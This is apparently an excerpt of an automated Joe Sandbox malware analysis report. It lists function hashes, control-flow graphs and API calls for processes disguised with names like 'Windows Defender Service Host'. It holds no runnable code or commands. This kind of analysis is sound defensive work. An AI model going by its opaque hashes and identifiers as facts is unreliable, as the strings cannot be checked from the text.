                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2597945224.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_e0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30dd53097dc8c7d6fbb543ce3e2b9040899337d2517089e41e39126d82b72af5
                                                    • Instruction ID: f30d1c4bbfc8e1aad26c08fc47fcc57084e761b123ba9784f63b8d4fc69d563a
                                                    • Opcode Fuzzy Hash: 30dd53097dc8c7d6fbb543ce3e2b9040899337d2517089e41e39126d82b72af5
                                                    • Instruction Fuzzy Hash: 24212871508204DFCB05DF94DDC0F26BF65FB98328F208569ED095B296C33AD896D7A2
                                                    Function 00E0D4D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2597945224.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_e0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 1eb78952c91a13511d32142da978e4fb9ad6d501620fca8c663202eddae5f793
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: D411D376504240CFCB16CF54D9C4B16BF71FB98328F24C6A9DD091B256C33AD85ACBA2

                                                    Executed Functions

                                                    Function 00007FF848F40F09 Relevance: .9, Instructions: 883COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 147d0cceb5b794bd4865b00b86e7702c92ecd1f4d762d2ea7723931ce308035e
                                                    • Instruction ID: ff1bdcf086bdeeb5d5ce3b09ac679b4e0e017297a88ae1ae715c17a476c07160
                                                    • Opcode Fuzzy Hash: 147d0cceb5b794bd4865b00b86e7702c92ecd1f4d762d2ea7723931ce308035e
                                                    • Instruction Fuzzy Hash: AB52E130B2DA195FEB98FB3C84552B9B7E2FF98780F440579D44ED32D2DE28A8418741
                                                    Function 00007FF848F40718 Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L_^ $L_^"$L_^$
                                                    • API String ID: 0-2518412377
                                                    • Opcode ID: ce15e1bff714ac5258246e35f8bf68b24c08ba19e95aff669f702955ac30a6f7
                                                    • Instruction ID: 48a76023531f74ba898ed305816baec6f35b0117bc3b8e3801c7a32e67eff9bb
                                                    • Opcode Fuzzy Hash: ce15e1bff714ac5258246e35f8bf68b24c08ba19e95aff669f702955ac30a6f7
                                                    • Instruction Fuzzy Hash: 5171353291E55A5FD381BB7CA4A11EB3FB0EF80358F4441B6D5888B293EF2C6506C695
                                                    Function 00007FF848F40C8E Relevance: .3, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f0c6ee000956a2130b1e8e06651cbb95abf239154a38b7766f98e9dd0310bf1
                                                    • Instruction ID: 5c1c4566db14ad4f7b0b779623ce067bfaf0b8bb493504220f0a92198bfdd417
                                                    • Opcode Fuzzy Hash: 8f0c6ee000956a2130b1e8e06651cbb95abf239154a38b7766f98e9dd0310bf1
                                                    • Instruction Fuzzy Hash: 4A713532A0D98A5FE795F77C98562B97BE2EF99650F0400BAD84DD32D3DE286C428341
                                                    Function 00007FF848F407D3 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 810f27fe2ae73f040134a2a207807e399345787f28a754d3ba395b16973bbd7f
                                                    • Instruction ID: 778f7a8b5ab9339f21f9547496e1a2ac6306841aa9c56f538dad5ff1a7903abe
                                                    • Opcode Fuzzy Hash: 810f27fe2ae73f040134a2a207807e399345787f28a754d3ba395b16973bbd7f
                                                    • Instruction Fuzzy Hash: EF41C232A5AA495FD381FB3CA4A11EA3F71EF84340F8045B6D548C7397DE2DA902C765
                                                    Function 00007FF848F40B29 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 196772fb10ac88743755aa63debd87c366776b1152b83f7d26ab16b51478cbe6
                                                    • Instruction ID: 50562895ea82808ade932628a029ed396b54660dad2f066e728db900ee86e3d3
                                                    • Opcode Fuzzy Hash: 196772fb10ac88743755aa63debd87c366776b1152b83f7d26ab16b51478cbe6
                                                    • Instruction Fuzzy Hash: 30311230E2990A9FE784B7B8584A3B9B6E1FF98B41F10017AE40DD32D3DE2C98008752
                                                    Function 00007FF848F40850 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e707988247b0b93ec43647053c5c9c1956c5d61d3e67f7b6be89ce3ac746c3f7
                                                    • Instruction ID: 752cb0fe77a83b83886f1c36400ed4e301b342c3ed229444b9381af3918248cd
                                                    • Opcode Fuzzy Hash: e707988247b0b93ec43647053c5c9c1956c5d61d3e67f7b6be89ce3ac746c3f7
                                                    • Instruction Fuzzy Hash: 6131AF31A9AA495FD381EB2C90B16AB7F71FF88300F8045A5D949C3397DE3DAA01C761
                                                    Function 00007FF848F409E1 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f16c5652ab0d5ae67496a4c8f740683991c3927d04e5107c7d788a29ab503ff
                                                    • Instruction ID: 859e76df4a045c95eb24d5c53d4a617c29e7d88b50a1b7e1eb21cafbf79ca30d
                                                    • Opcode Fuzzy Hash: 4f16c5652ab0d5ae67496a4c8f740683991c3927d04e5107c7d788a29ab503ff
                                                    • Instruction Fuzzy Hash: 40319E31A1990A9FDB84FB68C4656BEBBF2FF98301F500579D409E3286DE3CA841CB54
                                                    Function 00007FF848F41A49 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c972bd985fe35e62aea8c1c74e77a8169013e29a82733df95e454e7774a048e
                                                    • Instruction ID: a9691a057d27ed17a381b598bcaa1550d8c4ea782ce8e90b4cc99b900bc2a15f
                                                    • Opcode Fuzzy Hash: 4c972bd985fe35e62aea8c1c74e77a8169013e29a82733df95e454e7774a048e
                                                    • Instruction Fuzzy Hash: A5218D30B1D9594FE788EB2C946A379B2D2EB9C745F0405BEE00EC32D7DE689C418745
                                                    Function 00007FF848F41B41 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6222dac3b0682fc27faa2213d70e7e9e68fc3ef8d03c6d9795e2e1e8f6a569b5
                                                    • Instruction ID: 2a7054317e9ffe28c8bce71eff5a6150b12ec7361fd291b0cb9bbf053b5650fc
                                                    • Opcode Fuzzy Hash: 6222dac3b0682fc27faa2213d70e7e9e68fc3ef8d03c6d9795e2e1e8f6a569b5
                                                    • Instruction Fuzzy Hash: 89014C2590D6910FF351B33858264767FE4CFA5791F0804FBD8C9D71E7ED1899858392

                                                    Execution Graph

                                                    Execution Coverage:10.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:68
                                                    Total number of Limit Nodes:5
                                                    execution_graph 10950 2580848 10951 2580852 10950->10951 10955 25821b3 10950->10955 10960 258ba8a 10951->10960 10952 25808bf 10956 25821d5 10955->10956 10965 25822af 10956->10965 10969 25822c0 10956->10969 10961 258bab1 10960->10961 10977 258be20 10961->10977 10982 258bdf2 10961->10982 10962 258bacb 10962->10952 10966 25822b4 10965->10966 10967 25823c4 10966->10967 10973 2581980 10966->10973 10967->10967 10971 25822e7 10969->10971 10970 25823c4 10970->10970 10971->10970 10972 2581980 CreateActCtxA 10971->10972 10972->10970 10974 2583350 CreateActCtxA 10973->10974 10976 2583413 10974->10976 10978 258be6e 10977->10978 10987 258bf50 10978->10987 10991 258bf60 10978->10991 10979 258bf1a 10979->10962 10983 258be6e 10982->10983 10985 258bf50 FindWindowExA 10983->10985 10986 258bf60 FindWindowExA 10983->10986 10984 258bf1a 10984->10962 10985->10984 10986->10984 10988 258bf60 10987->10988 10989 258b804 FindWindowExA 10988->10989 10990 258c048 10988->10990 10989->10988 10990->10979 10994 258bf6e 10991->10994 10992 258b804 FindWindowExA 10992->10994 10993 258c048 10993->10979 10994->10992 10994->10993 10936 258bbd0 10937 258bc25 FindWindowA 10936->10937 10939 258bd14 10937->10939 10940 258d5f0 10941 258d5f1 GetCurrentProcess 10940->10941 10943 258d688 GetCurrentThread 10941->10943 10944 258d681 10941->10944 10945 258d6be 10943->10945 10946 258d6c5 GetCurrentProcess 10943->10946 10944->10943 10945->10946 10949 258d6fb 10946->10949 10947 258d723 GetCurrentThreadId 10948 258d754 10947->10948 10949->10947 10995 258dc40 DuplicateHandle 10996 258dcd6 10995->10996 10997 258ca60 10998 258ca6b 10997->10998 10999 258ca8c 10997->10999 10998->10999 11001 258e1f9 10998->11001 11002 258e206 11001->11002 11003 258e1d8 11001->11003 11009 258e230 11002->11009 11010 258da28 11002->11010 11003->10999 11005 258e23e 11006 258da28 OleInitialize 11005->11006 11005->11009 11007 258e26f 11006->11007 11007->11009 11014 258dafc 11007->11014 11009->10999 11011 258da33 11010->11011 11012 258dafc OleInitialize 11011->11012 11013 258e2f9 11011->11013 11012->11013 11013->11005 11015 258db07 11014->11015 11016 258e633 11015->11016 11018 258db18 11015->11018 11016->11009 11019 258e668 OleInitialize 11018->11019 11020 258e6cc 11019->11020 11020->11016

                                                    Executed Functions

                                                    Function 0258D5D0 Relevance: 6.1, APIs: 4, Instructions: 140threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 258d5d0-258d5e8 296 258d5ea-258d5f0 294->296 297 258d5f1-258d67f GetCurrentProcess 294->297 296->297 302 258d688-258d6bc GetCurrentThread 297->302 303 258d681-258d687 297->303 304 258d6be-258d6c4 302->304 305 258d6c5-258d6f9 GetCurrentProcess 302->305 303->302 304->305 306 258d6fb-258d701 305->306 307 258d702-258d71a 305->307 306->307 319 258d71d call 258dfa8 307->319 320 258d71d call 258dbb0 307->320 311 258d723-258d752 GetCurrentThreadId 312 258d75b-258d7bd 311->312 313 258d754-258d75a 311->313 313->312 319->311 320->311
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: f3459ce51985da1016b2177689cdb39d28bfff484585e16bc53d7cc6e9bf7529
                                                    • Instruction ID: 9ebdd1a2c22c5fce1b46e58b91b8f402f4b8e25c59e7fb9314e6092c7d4dadd7
                                                    • Opcode Fuzzy Hash: f3459ce51985da1016b2177689cdb39d28bfff484585e16bc53d7cc6e9bf7529
                                                    • Instruction Fuzzy Hash: A65156B09013498FDB14EFAAD648BAEBFF5FF49304F20C459E009A72A0D7789944CB65
                                                    Function 0258D5F0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 347 258d5f0-258d67f GetCurrentProcess 352 258d688-258d6bc GetCurrentThread 347->352 353 258d681-258d687 347->353 354 258d6be-258d6c4 352->354 355 258d6c5-258d6f9 GetCurrentProcess 352->355 353->352 354->355 356 258d6fb-258d701 355->356 357 258d702-258d71a 355->357 356->357 369 258d71d call 258dfa8 357->369 370 258d71d call 258dbb0 357->370 361 258d723-258d752 GetCurrentThreadId 362 258d75b-258d7bd 361->362 363 258d754-258d75a 361->363 363->362 369->361 370->361
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: a04fedc4ad4be4dd2ba02e112f0cf4ebbd4cc236ed1d286b802d63e1a6c1e0c9
                                                    • Instruction ID: 9305f648cb3dd6224c06dfe7cf0a90361886ae72f5afed1abd6e5265a29b04b0
                                                    • Opcode Fuzzy Hash: a04fedc4ad4be4dd2ba02e112f0cf4ebbd4cc236ed1d286b802d63e1a6c1e0c9
                                                    • Instruction Fuzzy Hash: 225146B09013098FDB14EFAAD648BAEBBF5FF49314F20C459D409A73A0D7785944CB65
                                                    Function 0258D5B3 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 321 258d5b3-258d5b4 322 258d614-258d67f GetCurrentProcess 321->322 323 258d5b6-258d5c2 321->323 328 258d688-258d6bc GetCurrentThread 322->328 329 258d681-258d687 322->329 323->322 330 258d6be-258d6c4 328->330 331 258d6c5-258d6f9 GetCurrentProcess 328->331 329->328 330->331 332 258d6fb-258d701 331->332 333 258d702-258d71a 331->333 332->333 345 258d71d call 258dfa8 333->345 346 258d71d call 258dbb0 333->346 337 258d723-258d752 GetCurrentThreadId 338 258d75b-258d7bd 337->338 339 258d754-258d75a 337->339 339->338 345->337 346->337
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: dc9e408e9e97c5128f55ea11ca6bf03d9ee60d84afe9fdb05afd17da52939fa3
                                                    • Instruction ID: 4102e19464873625ae14b64ea3d84946c3aa3a35047a79b016a5df695342752e
                                                    • Opcode Fuzzy Hash: dc9e408e9e97c5128f55ea11ca6bf03d9ee60d84afe9fdb05afd17da52939fa3
                                                    • Instruction Fuzzy Hash: F85186B09013498FDB14EFA9D548BEEBFF1FF4A304F20C499D109A72A1DA789845CB65
                                                    Function 0258C106 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 640 258c106-258c109 641 258c10b-258c178 640->641 642 258c0c1-258c0fa call 258b828 * 2 640->642 646 258c17a-258c184 641->646 647 258c1b1-258c1d1 641->647 646->647 649 258c186-258c188 646->649 655 258c20a-258c20f 647->655 656 258c1d3-258c1dd 647->656 652 258c18a-258c194 649->652 653 258c1ab-258c1ae 649->653 657 258c198-258c1a7 652->657 658 258c196 652->658 653->647 664 258c219-258c25d FindWindowExA 655->664 656->655 660 258c1df-258c1e1 656->660 657->657 659 258c1a9 657->659 658->657 659->653 662 258c1e3-258c1ed 660->662 663 258c204-258c207 660->663 665 258c1ef 662->665 666 258c1f1-258c200 662->666 663->655 667 258c25f-258c265 664->667 668 258c266-258c29e 664->668 665->666 666->666 670 258c202 666->670 667->668 674 258c2ae-258c2b2 668->674 675 258c2a0-258c2a4 668->675 670->663 676 258c2c2 674->676 677 258c2b4-258c2b8 674->677 675->674 678 258c2a6-258c2a9 call 2580224 675->678 682 258c2c3 676->682 677->676 679 258c2ba-258c2bd call 2580224 677->679 678->674 679->676 682->682
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 0258C24D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID: W
                                                    • API String ID: 134000473-655174618
                                                    • Opcode ID: 153425cfced16b0e93e9bc5ed37edc8a9a9c184aa3b774ec6d66a48a54b5ee09
                                                    • Instruction ID: 00b76fd0523e46fc9a4adc60445bca978943897dddac12b7b312b05b3784fec6
                                                    • Opcode Fuzzy Hash: 153425cfced16b0e93e9bc5ed37edc8a9a9c184aa3b774ec6d66a48a54b5ee09
                                                    • Instruction Fuzzy Hash: E9514971E006098FDB14EFA9C9807ADBBF2FF48705F10852AD85AB7284DBB49845CF95
                                                    Function 0258B804 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 990 258b804-258c178 993 258c17a-258c184 990->993 994 258c1b1-258c1d1 990->994 993->994 995 258c186-258c188 993->995 999 258c20a-258c25d FindWindowExA 994->999 1000 258c1d3-258c1dd 994->1000 997 258c18a-258c194 995->997 998 258c1ab-258c1ae 995->998 1001 258c198-258c1a7 997->1001 1002 258c196 997->1002 998->994 1010 258c25f-258c265 999->1010 1011 258c266-258c29e 999->1011 1000->999 1004 258c1df-258c1e1 1000->1004 1001->1001 1003 258c1a9 1001->1003 1002->1001 1003->998 1005 258c1e3-258c1ed 1004->1005 1006 258c204-258c207 1004->1006 1008 258c1ef 1005->1008 1009 258c1f1-258c200 1005->1009 1006->999 1008->1009 1009->1009 1012 258c202 1009->1012 1010->1011 1016 258c2ae-258c2b2 1011->1016 1017 258c2a0-258c2a4 1011->1017 1012->1006 1018 258c2c2 1016->1018 1019 258c2b4-258c2b8 1016->1019 1017->1016 1020 258c2a6-258c2a9 call 2580224 1017->1020 1024 258c2c3 1018->1024 1019->1018 1021 258c2ba-258c2bd call 2580224 1019->1021 1020->1016 1021->1018 1024->1024
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 0258C24D
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 111a1017cfb02f2ebbc39d947c9f7c9f3706cad7c80327ef2267eae7c6d03a1c
                                                    • Instruction ID: 418a4fa282d8cbd7a34e42e86d5733dae27171ebec899e86b5c18abe3058e275
                                                    • Opcode Fuzzy Hash: 111a1017cfb02f2ebbc39d947c9f7c9f3706cad7c80327ef2267eae7c6d03a1c
                                                    • Instruction Fuzzy Hash: 7E516771E002099FDB14EFE9C9817AEBBF1FB48700F10812AE856BB284D7B49841CF95
                                                    Function 0258BBC4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1025 258bbc4-258bc31 1027 258bc6a-258bc8a 1025->1027 1028 258bc33-258bc3d 1025->1028 1033 258bc8c-258bc96 1027->1033 1034 258bcc3-258bd12 FindWindowA 1027->1034 1028->1027 1029 258bc3f-258bc41 1028->1029 1030 258bc43-258bc4d 1029->1030 1031 258bc64-258bc67 1029->1031 1035 258bc4f 1030->1035 1036 258bc51-258bc60 1030->1036 1031->1027 1033->1034 1037 258bc98-258bc9a 1033->1037 1044 258bd1b-258bd53 1034->1044 1045 258bd14-258bd1a 1034->1045 1035->1036 1036->1036 1038 258bc62 1036->1038 1039 258bc9c-258bca6 1037->1039 1040 258bcbd-258bcc0 1037->1040 1038->1031 1042 258bca8 1039->1042 1043 258bcaa-258bcb9 1039->1043 1040->1034 1042->1043 1043->1043 1046 258bcbb 1043->1046 1050 258bd63-258bd67 1044->1050 1051 258bd55-258bd59 1044->1051 1045->1044 1046->1040 1053 258bd69-258bd6d 1050->1053 1054 258bd77 1050->1054 1051->1050 1052 258bd5b-258bd5e call 2580224 1051->1052 1052->1050 1053->1054 1056 258bd6f-258bd72 call 2580224 1053->1056 1058 258bd78 1054->1058 1056->1054 1058->1058
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 9b26de32696b4fed544588342df466118b17fcffb8fd2f0db170afa619b50020
                                                    • Instruction ID: 39f36853bed7cb965d25a77ffa4b35749c483aadbd406d306ba547a07cd83386
                                                    • Opcode Fuzzy Hash: 9b26de32696b4fed544588342df466118b17fcffb8fd2f0db170afa619b50020
                                                    • Instruction Fuzzy Hash: A35168B0D006599FDB10EFA8C88479EBBF5FB48318F148129E815FB294DBB49842CF85
                                                    Function 0258BBD0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1059 258bbd0-258bc31 1061 258bc6a-258bc8a 1059->1061 1062 258bc33-258bc3d 1059->1062 1067 258bc8c-258bc96 1061->1067 1068 258bcc3-258bd12 FindWindowA 1061->1068 1062->1061 1063 258bc3f-258bc41 1062->1063 1064 258bc43-258bc4d 1063->1064 1065 258bc64-258bc67 1063->1065 1069 258bc4f 1064->1069 1070 258bc51-258bc60 1064->1070 1065->1061 1067->1068 1071 258bc98-258bc9a 1067->1071 1078 258bd1b-258bd53 1068->1078 1079 258bd14-258bd1a 1068->1079 1069->1070 1070->1070 1072 258bc62 1070->1072 1073 258bc9c-258bca6 1071->1073 1074 258bcbd-258bcc0 1071->1074 1072->1065 1076 258bca8 1073->1076 1077 258bcaa-258bcb9 1073->1077 1074->1068 1076->1077 1077->1077 1080 258bcbb 1077->1080 1084 258bd63-258bd67 1078->1084 1085 258bd55-258bd59 1078->1085 1079->1078 1080->1074 1087 258bd69-258bd6d 1084->1087 1088 258bd77 1084->1088 1085->1084 1086 258bd5b-258bd5e call 2580224 1085->1086 1086->1084 1087->1088 1090 258bd6f-258bd72 call 2580224 1087->1090 1092 258bd78 1088->1092 1090->1088 1092->1092
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 40fff7cbd0cea72eef9c32b8e667e02672d93005244c052598f134b3c544a65b
                                                    • Instruction ID: 2ccb92403ef6ca2f7af87537d8ec7c362f0d2520a8a517e2544e67acc283cf87
                                                    • Opcode Fuzzy Hash: 40fff7cbd0cea72eef9c32b8e667e02672d93005244c052598f134b3c544a65b
                                                    • Instruction Fuzzy Hash: 715177B0D006099FDB10EFA9C88579EBBF5FB48318F108129E815FB244DBB49882CF85
                                                    Function 02583347 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1093 2583347-258334a 1094 258334c 1093->1094 1095 258334e 1093->1095 1094->1095 1096 2583350-2583351 1095->1096 1097 2583352-2583411 CreateActCtxA 1095->1097 1096->1097 1099 258341a-2583474 1097->1099 1100 2583413-2583419 1097->1100 1107 2583483-2583487 1099->1107 1108 2583476-2583479 1099->1108 1100->1099 1109 2583498 1107->1109 1110 2583489-2583495 1107->1110 1108->1107 1112 2583499 1109->1112 1110->1109 1112->1112
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02583401
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: ea8befba9acf7e66e0ca73c1d404024617578f0eb644731580d353167d9c88a8
                                                    • Instruction ID: 654dfdaa9ee6b26661cdb8e272c7887d3aa4c7d1a64a6e34b83f8dec5aa53346
                                                    • Opcode Fuzzy Hash: ea8befba9acf7e66e0ca73c1d404024617578f0eb644731580d353167d9c88a8
                                                    • Instruction Fuzzy Hash: FA4104B0C00319DADB25DFA9C848B9DBBB5BF44704F2080AAD409BB261DBB55946CF94
                                                    Function 02581980 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1113 2581980-2583411 CreateActCtxA 1117 258341a-2583474 1113->1117 1118 2583413-2583419 1113->1118 1125 2583483-2583487 1117->1125 1126 2583476-2583479 1117->1126 1118->1117 1127 2583498 1125->1127 1128 2583489-2583495 1125->1128 1126->1125 1130 2583499 1127->1130 1128->1127 1130->1130
